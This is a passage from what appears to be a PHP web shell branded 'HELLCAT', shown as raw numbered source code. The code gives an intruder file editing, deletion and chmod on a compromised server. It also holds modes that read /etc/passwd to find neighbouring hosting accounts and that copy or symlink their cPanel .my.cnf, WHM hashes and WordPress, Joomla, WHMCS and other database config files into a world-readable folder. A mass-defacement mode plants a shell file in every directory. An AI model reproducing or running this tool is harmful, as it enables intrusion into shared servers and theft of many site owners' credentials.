  976. <table style="width:100%">
  977. <td style="width:100%"><div class="dir-pallet"><table><td class="dir-td-left"><i class="fa fa-bandcamp"></i><td class="dir-td-right break">');
  978. foreach($scdir as $c_dir => $cdir) {   
  979.     echo "<a class='a' onclick=\"c('?dir=";
  980.     for($i = 0; $i <= $c_dir; $i++) {
  981.         echo $scdir[$i];
  982.         if($i != $c_dir) {
  983.         echo "/";
  984.         }
  985.     }
  986.     echo "')\">$cdir</a>/";
  987. }
  988. vars('</td></table></div></th></table></div>');
  989. $filez = basename($_COEG['file']);
  990. $size = filesize("$dir/$filez")/1024;
  991.             $size = round($size,3);
  992.             if($size > 1024) {
  993.                 $size = round($size/1024,2). ' MB';
  994.             } else {
  995.                 $size = $size. ' KB';
  996. }
  997. vars('<div class="coL">');
  998. if($_COEG['command'] == 'logout') {
  999. r($_SERVER['PHP_SELF']);
  1000. setcookie('HELLCAT', time() - 3600);
  1001. }  
  1002.  
  1003. // --- View Source --- //
  1004. elseif($_COEG['command'] == 'view') {
  1005. echo '<div class="coL-panel"><table>
  1006. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">SOURCE VIEWER</td></table></div>';
  1007. echo '<div class="coL-option">';
  1008. echo '<table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  1009. <hr>';
  1010. echo "<table><th><button class='coL-btn-option-active'><i class='fa fa-eye'></i></button></th>
  1011. <th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
  1012. <th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
  1013. <th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
  1014. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  1015. $source = htmlspecialchars(@file_get_contents($_COEG['file']));
  1016. if(empty($source)) {
  1017.     error('Source Not Found !!');
  1018.     echo x9;
  1019. } else {
  1020.     echo "<pre class='top'><code class='php'>".$source."</code></pre>";
  1021.     }
  1022. }
  1023.  
  1024. elseif($_COEG['command'] == 'edit') {
  1025.     if($_COEG['save']) {
  1026.         $save = file_put_contents($_COEG['file'], $_COEG['src']);
  1027.     if($save) {
  1028.     success('Source Saved !!');
  1029.         } else {
  1030.     error('Permission Denied !!');
  1031.     }
  1032. }
  1033. echo '<div class="coL-panel"><table>
  1034. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">EDIT FILE</td></table></div>';
  1035. echo '<div class="coL-option">
  1036. <table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  1037. <hr><table>';
  1038. echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
  1039. <th><button class='coL-btn-option-active'><i class='fa fa-pencil'></i></button></th>
  1040. <th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
  1041. <th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
  1042. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  1043. $source = htmlspecialchars(@file_get_contents($_COEG['file']));
  1044. if(empty($source)) {
  1045.     echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."'  style='margin:0px'>
  1046.     <textarea name='src' placeholder='# Put your code here...' class='top'></textarea><br>
  1047. <input onmousedown='bleep.play();'
  1048. type='submit' class='btn-exe' value='Save' name='save' style='margin-top:3px;width: 100%'></form>";
  1049. } else { echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px'>
  1050.     <textarea name='src' class='top'>".$source."</textarea>
  1051. <input onmousedown='bleep.play();'
  1052. type='submit' value='Save' name='save' class='btn-exe' style='margin-top:3px;width: 100%'></form>";
  1053.   }
  1054. }
  1055.  
  1056. elseif($_COEG['command'] == 'rename') {
  1057.         if($_COEG['rename']) {
  1058.         $rename = rename($_COEG['file'], "$dir/".htmlspecialchars($_COEG['rename'])."");
  1059.         if($rename) {
  1060. success('File Renamed !!');
  1061. mtr("?".x7."rename&".x5.$dir."&".x6.$dir."/".$_COEG["rename"]);
  1062.    } else {
  1063. error('Permission Denied !!');
  1064.         }
  1065. }
  1066. echo '<div class="coL-panel"><table>
  1067. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">RENAME FILE</td></table></div>';
  1068. echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  1069. <hr><table>';
  1070. echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button onmousedown='bleep.play();'
  1071. class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
  1072. <th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button onmousedown='bleep.play();'
  1073. class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
  1074. <th><button class='coL-btn-option-active'><i class='fa fa-edit'></i></button></th>
  1075. <th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button onmousedown='bleep.play();'
  1076. class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
  1077. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button onmousedown='bleep.play();'
  1078. class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  1079. echo "<div class='coL-option top'>
  1080. <br><br><br>
  1081.     <center>
  1082.         <i class='fa fa-file-o fa-3x'></i></center><br><br>";
  1083. echo "<form action='?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
  1084. <table cellspacing='0'>
  1085.     <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'><input type='text' value='".basename($_COEG['file'])."' name='rename'></td><td style='width:20%'>
  1086.     <button onmousedown='bleep.play();'
  1087. type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
  1088.     </form></div>";
  1089. }
  1090.  
  1091.  
  1092. else if($_COEG['command'] == 'chmod') {
  1093. if(isset($_COEG['perm'])) {
  1094. if(chmod($_COEG['file'],octdec($_COEG['perm']))) {
  1095. success('Chmod Ok !!');
  1096. mtr("?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']);
  1097. } else {
  1098. error('Permission Denied !!');
  1099.     }
  1100. }
  1101. echo '<div class="coL-panel"><table>
  1102. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">CHMOD FILE</td></table></div>';
  1103. echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="1D9D73">[</font> '.basename($_COEG['file']).' <font color="1D9D73">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  1104. <hr><table>';
  1105. echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button onmousedown='bleep.play();'
  1106. class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
  1107. <th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button onmousedown='bleep.play();'
  1108. class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
  1109. <th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button onmousedown='bleep.play();'
  1110. class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
  1111. <th><button class='coL-btn-option-active'><i class='fa fa-cogs'></i></button></th>
  1112. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button onmousedown='bleep.play();'
  1113. class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  1114. echo "<div class='coL-option top'>
  1115. <br><br><br>
  1116.     <center>
  1117.         <i class='fa fa-file-o fa-3x'></i></center><br><br>";
  1118. echo "<form action='?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
  1119. <table cellspacing='0'>
  1120.     <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'>
  1121. <input type='text' value='".substr(sprintf("%o", fileperms($_COEG['file'])), -4)."' name='perm' style='width:100%'>
  1122. <input type='hidden' name='path' value='".$_COEG['file']."'></td><td style='width:20%'>
  1123.     <button onmousedown='bleep.play();'
  1124. type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
  1125.     </form></div>";
  1126. }
  1127.  
  1128. elseif($_COEG['command'] == 'delete') {
  1129. $delete = unlink($_COEG['file']);
  1130. if($delete) {
  1131.         vars('<script>c("?'.x5.$dir.'");</script>');
  1132.     } else {
  1133.         error('Permission Denied !!');
  1134.     }
  1135. }
  1136.  
  1137. elseif($_COEG['command'] == 'jumping') {
  1138. echo '<div class="coL-panel"><table>
  1139. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">JUMPING SERVER</td></table></div>';
  1140. $i = 0;
  1141. $s_a = fopen("/etc/passwd", "r");
  1142. while($s_b = fgets($s_a)) {
  1143.     if($s_b == '' || !$s_a) {
  1144.          error("Can't Read [ /etc/passwd ]");
  1145.                  mtr("?".x5.$dir);
  1146.                  echo x9;
  1147.     } else {
  1148.         preg_match_all('/(.*?):x:/', $s_b, $s_c);
  1149.         foreach($s_c[1] as $s_d) {
  1150.             $s_e = "/home/$s_d/public_html";
  1151.             if(is_readable($s_e)) {
  1152.                 $i++;
  1153.                 $s_o = "<table style='width:100%' class='table-info' cellspacing='0'><td style='width:120px' class='td-file'><img src='data:image/png;base64, R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'> <a href='?dir=$s_e'>[ $s_d ]</a></td>";
  1154.                 if(is_writable($s_e)) {
  1155.                     $s_o = "<table style='width:100%' class='table-info' cellspacing='0'><td style='width:120px' class='td-info'><img src='data:image/png;base64, R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'>
  1156.                      <a href='?dir=$s_e'><font color='red'>[ $s_d ]</font></a></td>";
  1157.                 }
  1158.                 echo $s_o;
  1159.                 $s_k = file_get_contents("/etc/named.conf");   
  1160.                 if($s_k == '') {
  1161.                      success('Server Not Found !!');
  1162.                      mtr("?".x5.$dir);
  1163.                       echo x9;
  1164.                 } else {
  1165.                     preg_match_all("#/var/named/(.*?).db#", $s_k, $s_v);
  1166.                     foreach($s_v[1] as $s_x) {
  1167.                         $s_g = posix_getpwuid(@fileowner("/etc/valiases/$s_x"));
  1168.                         $s_g = $s_g['name'];
  1169.                         if($s_g == $s_d) {
  1170.                             echo "<td class='td-info'><a href='http://$s_x'>http://$s_x</a> </td></table>"; break;}}}}}}}
  1171. if($i == 0) {
  1172.          error('Server Not Found !!');
  1173.          mtr("?".x5.$dir);
  1174.          echo x9;
  1175. } else {
  1176.     echo "<div class='coL-option top'>Total : <span class='label label-default'> ".$i." <span></div>";
  1177.     }
  1178. }
  1179.  
  1180. elseif($_COEG['command'] == 'config') {
  1181.     $s_t = fopen("/etc/passwd", "r");
  1182.     $s_z = mkdir("hellcatindonesia", 0777);
  1183.     $s_s = "Options all\
  1184. Require None\
  1185. Satisfy Any";
  1186.     $s_d = fopen("hellcatindonesia/.htaccess","w");
  1187.     fwrite($s_d, $s_s);
  1188.     while($s_q = fgets($s_t)) {
  1189.         if($s_q == "" || !$s_t) {
  1190.     error('Can\'t Read etc/passwd !!');
  1191.         } else {
  1192.             preg_match_all('/(.*?):x:/', $s_q, $s_y);
  1193.             foreach($s_y[1] as $s_p) {
  1194.                 $s_k = "/home/$s_p/public_html/";
  1195.                 if(is_readable($s_k)) {
  1196.                     $s_g = array(
  1197.                         "/home/$s_p/.my.cnf" => "cpanel",
  1198.                         "/home/$s_p/.accesshash" => "WHM-accesshash",
  1199.                         "/home/$s_p/public_html/bw-configs/config.ini" => "BosWeb",
  1200.                         "/home/$s_p/public_html/config/koneksi.php" => "Lokomedia",
  1201.                         "/home/$s_p/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  1202.                         "/home/$s_p/public_html/clientarea/configuration.php" => "WHMCS",
  1203.                         "/home/$s_p/public_html/whm/configuration.php" => "WHMCS",
  1204.                         "/home/$s_p/public_html/whmcs/configuration.php" => "WHMCS",
  1205.                         "/home/$s_p/public_html/forum/config.php" => "phpBB",
  1206.                         "/home/$s_p/public_html/sites/default/settings.php" => "Drupal",
  1207.                         "/home/$s_p/public_html/config/settings.inc.php" => "PrestaShop",
  1208.                         "/home/$s_p/public_html/app/etc/local.xml" => "Magento",
  1209.                         "/home/$s_p/public_html/joomla/configuration.php" => "Joomla",
  1210.                         "/home/$s_p/public_html/configuration.php" => "Joomla",
  1211.                         "/home/$s_p/public_html/wp/wp-config.php" => "WordPress",
  1212.                         "/home/$s_p/public_html/wordpress/wp-config.php" => "WordPress",
  1213.                         "/home/$s_p/public_html/wp-config.php" => "WordPress",
  1214.                         "/home/$s_p/public_html/admin/config.php" => "OpenCart",
  1215.                         "/home/$s_p/public_html/slconfig.php" => "Sitelok",
  1216.                         "/home/$s_p/public_html/application/config/database.php" => "Ellislab");
  1217.                     foreach($s_g as $s_h => $s_l) {
  1218.                         $s_r = file_get_contents($s_h);
  1219.                         if($s_r == '') {
  1220.                         } else {
  1221.                             $fcS = fopen("hellcatindonesia/$s_p-$s_l.txt","w");
  1222.                             fputs($fcS,$s_r);
  1223.                         }}}}}}
  1224. success('OK !!');
  1225. vars("<script>c('?".x5.$dir."/hellcatindonesia');</script>");
  1226. }
  1227.  
  1228.  
  1229. elseif($_COEG['command'] == 'cookie') {
  1230. vars('<div class="coL-panel"><table>
  1231. <td class="td-panel"><center><i class="fa fa-bug"></i></center></td><td class="td-panel-right">COOKIES MANAGER</td></table></div>');
  1232. vars("<table class='table-info' cellspacing='0'>");
  1233. vars("<th class='th-info cookie-td'><center>Name</center></th><th class='th-info' style='width:30px'><center><i class='fa fa-angle-right'></i></th><th class='th-info'><center>Value</center></th><tr class='ex-hov'>");
  1234. if(count($_COOKIE) != 0) {
  1235. foreach($_COOKIE as $c1 => $c2) {
  1236. echo "<td class='td-info break'>".$c1."</td><td class='td-info' style='width:30px'><center><i class='fa fa-angle-right'></i></td><td class='td-info break'>".$c2."</td><tr class='ex-hov'>";
  1237. }
  1238. vars("</table>");
  1239. }
  1240. vars('<div class="coL-option" style="padding:7px">');
  1241. vars("<table><td style='text-align:center;width:20px'><span class='label label-default'><i class='fa fa-angle-right'></i></span></td><td> Cookies Found : [ <font color='1D9D73'> ".count($_COOKIE)."</font> ]</td></table></div>");
  1242. if(isset($_POST['c3'])) {
  1243. if(setcookie($_POST['c3'],$_POST['c2'])) {
  1244.     success('Cookie Created !!');
  1245.     mtr('?'.x7.'cookie&'.x5.$dir);
  1246. } else {
  1247.     error('Permission Denied !!');
  1248.     }
  1249. }
  1250. echo '<form style="margin:0px" action="?'.x7.'cookie&'.x5.$dir.'" method="POST">
  1251. <table cellspacing="0" class="top">
  1252. <td><input type="text" placeholder="Name" name="c3"></td>
  1253. <td><input type="text" placeholder="Value" name="c2"></td>
  1254. <td style="width:50px"><button onmousedown="bleep.play();"
  1255. class="btn-exe" type="submit"><i class="fa fa-arrow-circle-right"></i></button></td></table></form>';
  1256. }
  1257.  
  1258. elseif($_COEG['command'] == 'cpanel') {
  1259. echo '<div class="coL-panel"><table>
  1260. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">CPANEL FINDER</td></table></div>';
  1261. @ini_set('display_errors',0);
  1262. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  1263.     $ar0=explode($marqueurDebutLien, $text);
  1264.     $ar1=explode($marqueurFinLien, $ar0[$i]);
  1265.     return trim($ar1[0]);
  1266. }
  1267. $d0mains = @file('/etc/named.conf');
  1268. $domains = scandir("/var/named");
  1269. if ($domains or $d0mains) {
  1270.     $domains = scandir("/var/named");
  1271.     if($domains) {
  1272. echo "<table class='table-info' style='width:100%'><th class='th-info'> <center>Domain</center> </th><th class='th-info'> <center>Result</center></th></tr>";
  1273. $count=1;
  1274. $dc = 0;
  1275. $list = scandir("/var/named");
  1276. foreach($list as $domain){
  1277. if(strpos($domain,".db")){
  1278. $domain = str_replace('.db','',$domain);
  1279. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1280. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  1281. $path = getcwd();
  1282. if (is_readable($dirz)) {
  1283. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  1284. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  1285. $password=entre2v2($p,'password="','"');
  1286. echo "<tr>
  1287. <td class='td-info' style='width:150px'><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td>
  1288. <td class='td-info'><a class='a' href='".$owner['name'].".txt' target='_blank'>OPEN</a></td></tr>";
  1289. $dc++; }}}
  1290. echo '</table>';
  1291. $total = $dc;
  1292. echo '<div class="coL-option top" style="">Total Cpanel : <span class="label label-default">'.$total.'</span></div>';
  1293. }else{
  1294. $d0mains = @file('/etc/named.conf');
  1295.     if($d0mains) {
  1296. echo "<table class='table-info' style='width:100%'><tr><th class='th-info'> <center>Domain</center> </th><th class='th-info'> <center>Result</center> </th></tr>";
  1297. $count=1;
  1298. $dc = 0;
  1299. $mck = array();
  1300. foreach($d0mains as $d0main){
  1301.     if(@eregi('zone',$d0main)){
  1302.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
  1303.         flush();
  1304.         if(strlen(trim($domain[1][0])) >2){
  1305.             $mck[] = $domain[1][0];
  1306.         } } }
  1307. $mck = array_unique($mck);
  1308. $usr = array();
  1309. $dmn = array();
  1310. foreach($mck as $o) {
  1311.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  1312.     $usr[] = $infos['name'];
  1313.     $dmn[] = $o;
  1314. }
  1315. array_multisort($usr,$dmn);
  1316. $dt = file('/etc/passwd');
  1317. $passwd = array();
  1318. foreach($dt as $d) {
  1319.     $r = explode(':',$d);
  1320.     if(strpos($r[5],'home')) {
  1321.         $passwd[$r[0]] = $r[5];
  1322.     }
  1323. }
  1324. $l=0;
  1325. $j=1;
  1326. foreach($usr as $r) {
  1327. $dirz = '/home/'.$r.'/.my.cnf';
  1328. $path = getcwd();
  1329. if (is_readable($dirz)) {
  1330. copy($dirz, $path.'/'.$r.'.txt');
  1331. $p=file_get_contents($path.'/'.$r.'.txt');
  1332. $password=entre2v2($p,'password="','"');
  1333. echo "<tr>
  1334. <td class='td-info'><a target='_blank' href=http://".$dmn[$j-1]."/>".$dmn[$j-1]." </a></td>
  1335. <td class='td-info'><a href='".$r.".txt'>OPEN</a> </center></td></tr>";
  1336. $dc++;
  1337.                 flush();
  1338.                 $l=$l?0:1;
  1339.                 $j++;
  1340.         }
  1341.     }
  1342. }
  1343. echo '</table>';
  1344. $total = $dc;
  1345. echo '<div class="coL-option top" style="">Total Cpanel : <span class="label label-default">'.$total.'</span></div>';
  1346.     }
  1347. } else{
  1348.     error('Access Disabled !!');
  1349.     mtr('?'.x5.$dir);
  1350.     echo x9;
  1351.     }
  1352. }
  1353.  
  1354. elseif($_COEG['command'] == 'massdef') {
  1355. echo '<div class="coL-panel"><table>
  1356. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">HELLCAT MODE</td></table></div>';
  1357. echo '<div class="coL-option">';
  1358. echo "<form action='?".x7."massdef&".x5.$dir."' method='post'>";
  1359. echo "<table cellspacing='0'>
  1360. <td align='left' style='padding:7px;width:60px'>
  1361. Root :</td><td><input type='text' name='base_dir' style='width:100%' value='".getcwd()."'></td></tr>";
  1362. echo "<tr><td align='left' style='padding:7px;width:60px'>File :</td><td> <input type='text' name='file_name' value='hellcat_shell.php' style='width:100%' placeholder=''></td></tr></table>";
  1363. echo "<br>Source :<br><br>
  1364. <textarea name='index'>Shell Code..</textarea>";
  1365. echo "<input onmousedown='bleep.play();' type='submit' value='MODE ON' class='btn-exe' style='width:100%;margin-top:3px'></form></center></div>";
  1366. if (isset ($_COEG['base_dir']))
  1367. {
  1368.         if (!file_exists ($_COEG['base_dir'])) {
  1369.  $alert = "Destination Not Found !";
  1370.  failed1($alert); }
  1371.         @chdir ($_COEG['base_dir']) or die ("<script>alert('Cannot Open Directory');</script>");
  1372.  
  1373.         $files = @scandir ($_COEG['base_dir']) or die ("Oh Shit !!<br>");
  1374.         foreach ($files as $file):
  1375.                 if ($file != "." && $file != ".." && @filetype ($file) == "dir")
  1376.                 {
  1377.                         $index = getcwd ()."/".$file."/".$_COEG['file_name'];
  1378.                         if (file_put_contents ($index, $_COEG['index']))
  1379.                                 echo "
  1380.                <div class='coL-option break wrap' style='margin-top:2px;margin-bottom:2px'><span class='label-default'>+</span>  Bartes Dwiky </span></div>"; }
  1381.         endforeach;
  1382.     }
  1383. }
  1384.  
  1385. elseif($_COEG['command'] == 'multihash') {
  1386. vars('<div class="coL-panel"><table>
  1387. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">MULTI HASH</td></table></div>');
  1388. if($_COEG['encrypt']) {
  1389.     switch($_COEG['id']) {
  1390.         case '1':
  1391. if(md5($_COEG['text'])) {
  1392. vars("<div class='coL-option top'><table style='margin-bottom:3px'>
  1393. <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$_COEG['text']."</td><tr><td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Md5 :</td><td class='break'> ".md5($_COEG['text'])."</td></table></div>"); } else {
  1394.     error('Permission Denied !!');
  1395.     }
  1396. break;
  1397. case '2':
  1398. if(crc32($_COEG['text'])) {
  1399. vars("<div class='coL-option top'><table style='margin-bottom:3px'>
  1400. <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$_COEG['text']."</td><tr><td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Crc32 :</td><td class='break'> ".crc32($_COEG['text'])."</td></table></div>"); } else {
  1401.     error('Permission Denied !!');
  1402.     }
  1403. break;
  1404. case '3':
  1405. if(sha1($_COEG['text'])) {
  1406. vars("<div class='coL-option top'><table style='margin-bottom:3px'>
  1407. <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$_COEG['text']."</td><tr><td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Sha1 :</td><td class='break'> ".sha1($_COEG['text'])."</td></table></div>"); } else {
  1408.     error('Permission Denied !!');
  1409.     }
  1410. break;
  1411. case '4':
  1412. vars("<div class='coL-option top'><table style='margin-bottom:3px'>
  1413. <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$_COEG['text']."</td><tr>
  1414. <td class='td-md5'
  1415. style='width:70px'><font color='#1D9D73'>+</font> Md5 :</td><td class='break'> ".md5($_COEG['text'])."</td><tr>
  1416. <td class='td-md5'
  1417. style='width:70px'><font color='#1D9D73'>+</font> Crc32 :</td><td class='break'> ".crc32($_COEG['text'])."</td><tr>
  1418. <td class='td-md5' style='width:70px'><font color='#1D9D73'>+</font> Sha1 :</td><td class='break'> ".sha1($_COEG['text'])."</td></table></div>");
  1419. break;
  1420.     }
  1421. }
  1422. vars("<div class='coL-option top'>
  1423.     <form action='?".x7."multihash&".x5.$dir."' method='post'>
  1424. <table style='width:100%'>
  1425.     <td style='width:20%'>Text :</td><td style='width:80%'>
  1426.     <input type='text' name='text' style='width:100%'>
  1427. </td><tr>
  1428. <td style='width:20%'>Hash :</td><td style='width:80%'><select name='id' style='width:100%'>
  1429. <option value='1'>Md5</option>
  1430. <option value='2'>Crc32</option>
  1431. <option value='3'>Sha1</option>
  1432. <option value='4'>All</option>
  1433. </select></td><tr><td style='width:20%'></td><td style='width:80%'>
  1434.     <input onmousedown='bleep.play();'
  1435. type='submit' value='Create' name='encrypt' class='btn-exe' style='width:100px'></td></table></form></div>");
  1436. }
  1437.  
  1438. elseif($_COEG['command'] == 'symlink') {
  1439. echo '<div class="coL-panel"><table>
  1440. <td class="td-panel"><i class="fa fa-bug"></i></td><td class="td-panel-right">MULTI SYMLINK</td></table></div>';
  1441. if(is_readable("/etc/named.conf")) {
  1442.     $named = '<a href="?symlink=named.conf&dir='.$dir.'">OPEN</a>';
  1443.     } else {
  1444.     $named = '<font color="red">DISABLED</font>';
  1445. }
  1446. if(is_readable("/etc/valiases")) {
  1447.     $valiases = '<a href="?symlink=valiases&dir='.$dir.'">OPEN</a>';
  1448.     } else {
  1449.     $valiases = '<font color="red">DISABLED</font>';
  1450. }
  1451. if(is_readable("/etc/passwd")){
  1452.     $passwd = '<a href="?symlink=passwd&dir='.$dir.'">OPEN</a>';
  1453.     } else {
  1454.     $passwd = '<font color="red">DISABLED</font>';
  1455.     }
  1456. if(is_readable("/var/named")){
  1457.     $var = '<a href="?symlink=var&dir='.$dir.'">OPEN</a>';
  1458.     } else {
  1459.     $var = '<font color="red">DISABLED</font>';
  1460.     }  
  1461. echo '<table class="table-info">';
  1462.     echo '<th class="th-info">From</th>';
  1463.     echo '<th class="th-info">Arrow</th>';
  1464.     echo '<th class="th-info">Action</th>';
  1465.     echo '<tr>';
  1466.     echo '<td class="td-info"><span class="label-default">+</span> [ /etc/named.conf ]</td><td class="td-info"><center>&raquo;</center></td><td class="td-info"><center>'.$named.'</a></center></td>';
  1467.     echo '<tr>';
  1468.     echo '<td class="td-info"><span class="label-default">+</span> [ /etc/valiases ]</td><td class="td-info""><center>&raquo;</center></td><td class="td-info"><center>'.$valiases.'</a></center></td>';
  1469.     echo '<tr>';
  1470.     echo '<td class="td-info"><span class="label-default">+</span> [ /etc/passwd ]</td><td class="td-info"><center>&raquo;</center></td><td class="td-info"><center>'.$passwd.'</a></center></td>';
  1471.     echo '<tr>';
  1472.     echo '<td class="td-info"><span class="label-default">+</span> [ /var/named/ ]</td><td class="td-info"><center>&raquo;</center></td><td class="td-info"><center>'.$var.'</a></center></td>';
  1473.     echo '</table>';
  1474. @mkdir('hellcat',0777);
  1475. @symlink("/","hellcat/root");
  1476. $htaccss = "Options all
  1477. DirectoryIndex Sux.html
  1478. AddType text/plain .php
  1479. AddHandler server-parsed .php
  1480. AddType text/plain .html
  1481. AddHandler txt .html
  1482. Require None
  1483. Satisfy Any";
  1484. file_put_contents("hellcat/.htaccess",$htaccss);
  1485. $ms_2 = file_get_contents("/etc/passwd");
  1486. $ms_2z = explode("\n",$ms_2);
  1487.    
  1488.     foreach($ms_2z as $ms_3){
  1489. $ms_1 = explode(":",$ms_3);
  1490. error_reporting(0);
  1491.  
  1492. $ms_4 = posix_getcwd();
  1493. $dr = explode("/",$ms_4);
  1494.  
  1495. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/wp-config.php',"hellcat/".$ms_1[0].'-WordPress.txt');
  1496. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/blog/wp-config.php',"hellcat/".$ms_1[0].'-WordPress.txt');
  1497. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/wp/wp-config.php',"hellcat/".$ms_1[0].'-WordPress.txt');
  1498. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/site/wp-config.php',"hellcat/".$ms_1[0].'-WordPress.txt');
  1499. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/config.php',"hellcat/".$ms_1[0].'-PhpBB.txt');
  1500. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/includes/config.php',"hellcat/".$ms_1[0].'-vBulletin.txt');
  1501. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/configuration.php',"hellcat/".$ms_1[0].'-Joomla.txt');
  1502. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/web/configuration.php',"hellcat/".$ms_1[0].'-Joomla.txt');
  1503. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/joomla/configuration.php',"hellcat/".$ms_1[0].'-Joomla.txt');
  1504. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/site/configuration.php',"hellcat/".$ms_1[0].'-Joomla.txt');
  1505. symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/conf_global.php',"hellcat/".$ms_1[0].'-IPB.txt');
